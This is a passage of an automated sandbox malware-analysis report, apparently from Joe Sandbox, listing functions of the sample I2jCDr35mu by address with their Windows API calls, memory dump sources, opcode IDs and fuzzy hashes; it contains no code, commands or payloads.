                                                                                                                                                                                    • Instruction ID: 2206c456c8f669392a0dd884128e15d6de8cf847415a6e48bfad55e854f86694
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cec1d7bce9c5a0d3b99e84623156c2a39a62e5174d8c42fd3ec4a6a6616dba8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15411672A001089BCF15EF28ED806AEB7E5AF44320F140679F804DB286D770DE219BD1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00095E10 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00095EF7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                    • Opcode ID: 1819d569700762d0e87632a829e4eef5041ad79baed4d23d64e835174621f787
                                                                                                                                                                                    • Instruction ID: 3a09a56e352a3fbc3593d920b7a1707a7c6e4e8474621ff6da80cff6940f4bc5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1819d569700762d0e87632a829e4eef5041ad79baed4d23d64e835174621f787
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F316D72A006146FCF199F25DC406AEB7E8FF64361F14423AF8158B291D772EA90D7E0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D30299 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    • Opcode ID: dd01383f41f06561f0b5f49abed7e644cc002e5cd6f7ef747c7c94312d3083d8
                                                                                                                                                                                    • Instruction ID: 49d032ef9a926892f04983829382ca886164a556b4bb9f6ebebb681eecf8d120
                                                                                                                                                                                    • Opcode Fuzzy Hash: dd01383f41f06561f0b5f49abed7e644cc002e5cd6f7ef747c7c94312d3083d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B210CFB24C2206EE34381855B947FA676EE7C7331B30407AF483C6646F3946A496172
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00032A50 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00032B87
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                    • Opcode ID: e9bcf44a1bdffe34b9b9824670fbb32fa2c0043b41b69b3c347c12ef6391b937
                                                                                                                                                                                    • Instruction ID: bee64c02f81e6609d19bf958c78f3056a9991de498209f5d4bf9344d0db1918f
                                                                                                                                                                                    • Opcode Fuzzy Hash: e9bcf44a1bdffe34b9b9824670fbb32fa2c0043b41b69b3c347c12ef6391b937
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D41E372A000059FC719DF7CCD8596EBBEDEF95350B288668E819CB385EB70ED4187A1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00032910 Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00032A42
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                    • Opcode ID: 8ab170e44ebbc933418f56c18018b750e45fd08bc0b246c6792573cc29b1cf9b
                                                                                                                                                                                    • Instruction ID: 4c729ae63499bf24bd80a1dd78bb51155bfb036adf6d5d21b198c87d2a751cbd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ab170e44ebbc933418f56c18018b750e45fd08bc0b246c6792573cc29b1cf9b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D415C72A002049FC726DF6CD8806AEBBA9EF94350F1446B9E8589B342D731ED11C7D1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D302C9 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    • Opcode ID: c476368167b0a1ccc5bf39a1ec5989cad709aaeaec9cd2110b3d2d3402cce454
                                                                                                                                                                                    • Instruction ID: 58f9d72702a924315b5598442d3820ebee06a47a0d65857c140a2d1dc21263ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: c476368167b0a1ccc5bf39a1ec5989cad709aaeaec9cd2110b3d2d3402cce454
                                                                                                                                                                                    • Instruction Fuzzy Hash: 75214BE724C2207EF20340405F90AFA6A6EE7C7731730806AF88797646F2D46A086172
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D30293 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    • Opcode ID: 6fd14f2cc74b96893e1c2417598fc81e88baf8d082907df1dcece392d2da5508
                                                                                                                                                                                    • Instruction ID: f441fb2f23625decf98acce31a996d67f345135186b15892d7305395ac7609f9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fd14f2cc74b96893e1c2417598fc81e88baf8d082907df1dcece392d2da5508
                                                                                                                                                                                    • Instruction Fuzzy Hash: FB212CEB20C220BEF24380415B90BFA6B5EE7C7731B30406AF48786746F7D46A497172
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D302B4 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    • Opcode ID: 7967110aed47b32cac30ba5032f2334288ec88a1acb32a7db92df9d4e1233be5
                                                                                                                                                                                    • Instruction ID: f8c88643e5bcda184063876092ee400704698de157e7e7aecac2dc9658ed21b3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7967110aed47b32cac30ba5032f2334288ec88a1acb32a7db92df9d4e1233be5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1921FCE724C2207EA64341415BA4BFA6A6DEBC7731B30406AF88786646F3D46A4971B2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D30321 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    • Opcode ID: 46ed52ff5622c4e3819ca9bcf1a3ad434ad660591d9e9bbdc8b6c1408d64ba3a
                                                                                                                                                                                    • Instruction ID: 5b1ebc0a9ce6b7626190b5fa4ce821d62920961e318964fd75bb7d7fdd2fcf1c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 46ed52ff5622c4e3819ca9bcf1a3ad434ad660591d9e9bbdc8b6c1408d64ba3a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 99215BE760D2507FB60341506E55AF96B19EAC723533440BAF4C28A657F2867A0AA272
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D3034B Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    • Opcode ID: 1c7bf231d7b3f1a9f7cbfebb0be0c3e49052b66bb841a28a9d2e5366c8e99306
                                                                                                                                                                                    • Instruction ID: dd17ba729dc0a35452dcf1d1746917e580c8fbd7c1de66bc5ca112aa8ce7a616
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c7bf231d7b3f1a9f7cbfebb0be0c3e49052b66bb841a28a9d2e5366c8e99306
                                                                                                                                                                                    • Instruction Fuzzy Hash: EF2138EB64C2507EF60345406E51BFA6B1DF7C7731B30406BF4838664AF3946E0961B2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D302F3 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    • Opcode ID: b7c56650fd18cf985b5e0289c475e340dee394629a5382943eddace554514ae3
                                                                                                                                                                                    • Instruction ID: 097ad3845ac3c5d5c2889ea16623e15759bdd210589d02f905f0a309c384a8ad
                                                                                                                                                                                    • Opcode Fuzzy Hash: b7c56650fd18cf985b5e0289c475e340dee394629a5382943eddace554514ae3
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8110AF720C2107FA20385406A55AFA7B6DEBC6330B30407EF887D7646F3946A09A172
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D3033D Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    • Opcode ID: f81d5220b7ebdb0be2af2de2394b54598dc92fcb1af1b961fb17250af3e5f4c5
                                                                                                                                                                                    • Instruction ID: 05b86cbfea4edc80e2f98919146df11c2dd017a6f5afb778de04b943809d26b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: f81d5220b7ebdb0be2af2de2394b54598dc92fcb1af1b961fb17250af3e5f4c5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E01D2F720C2107EB10341816F51AFAA72DEAC7734730847AF893CA64AF2D46A0971B2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D30390 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    • Opcode ID: 6c39e78612b6c1a54f6bf29bd276b1ebde43cbce662a546f32e8249598154781
                                                                                                                                                                                    • Instruction ID: a812a9cbdb84b9201820b29ed254fff2a206b7b1de00e5a5988bb50e212a53b2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c39e78612b6c1a54f6bf29bd276b1ebde43cbce662a546f32e8249598154781
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F114EF760D2907EF20381507E519FA7B2CE9C373433584BAF851DB547D2491A0BA272
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D3037F Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Process32NextW.KERNEL32(?,00005EF3,00000063), ref: 04D30411
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741368714.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NextProcess32
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1850201408-0
                                                                                                                                                                                    • Opcode ID: 589d38475489f5063f6b14d71ca74324d0adb7107b82f53550b113e9f98d400f
                                                                                                                                                                                    • Instruction ID: 0e4735aca8ce56fa3be5574629ce5ee981d556414938710c67df65e8c917f288
                                                                                                                                                                                    • Opcode Fuzzy Hash: 589d38475489f5063f6b14d71ca74324d0adb7107b82f53550b113e9f98d400f
                                                                                                                                                                                    • Instruction Fuzzy Hash: A501D6F720C2507EB1034541AF50FFA6B6DE6C6734730847AF892D6646F2946E49B172
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00099540 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00099591
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                    • Opcode ID: 683de2f2cae292e3b6cb8c50230ecd20031485c80ab28ee38cbdf0820e01ed37
                                                                                                                                                                                    • Instruction ID: 46579e2f5b048e614fcc229da33dbafb001313953b314671ec1ca7b2fef20153
                                                                                                                                                                                    • Opcode Fuzzy Hash: 683de2f2cae292e3b6cb8c50230ecd20031485c80ab28ee38cbdf0820e01ed37
                                                                                                                                                                                    • Instruction Fuzzy Hash: 680145721005080BEF08A77CD84A96F73888F68360B44833DF82AC6682E724EA908755
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 001226B2 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000,00000000,CF830579,?,00122599,00000000,CF830579,00161148,0000000C,00122655,0011675D,?), ref: 00122708
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                    • Opcode ID: fbec76699fbe9008d39de39b88e11a770dcfc87b970ada30618a61288a2b2091
                                                                                                                                                                                    • Instruction ID: e1dd7e90218179422105beabaef533e5c52cd07e326fc790c856688077c0006f
                                                                                                                                                                                    • Opcode Fuzzy Hash: fbec76699fbe9008d39de39b88e11a770dcfc87b970ada30618a61288a2b2091
                                                                                                                                                                                    • Instruction Fuzzy Hash: 751148336065346ADA2932B47C46B6E3B4A9FA2B34F350219EC048F1E2DF719CA08270
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0011BBFC Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00160E00,0010C152,00000002,0010C152,00000000,?,?,?,0011BD06,00000000,?,0010C152,00000002,00160E00), ref: 0011BC38
                                                                                                                                                                                    Memory Dump Source
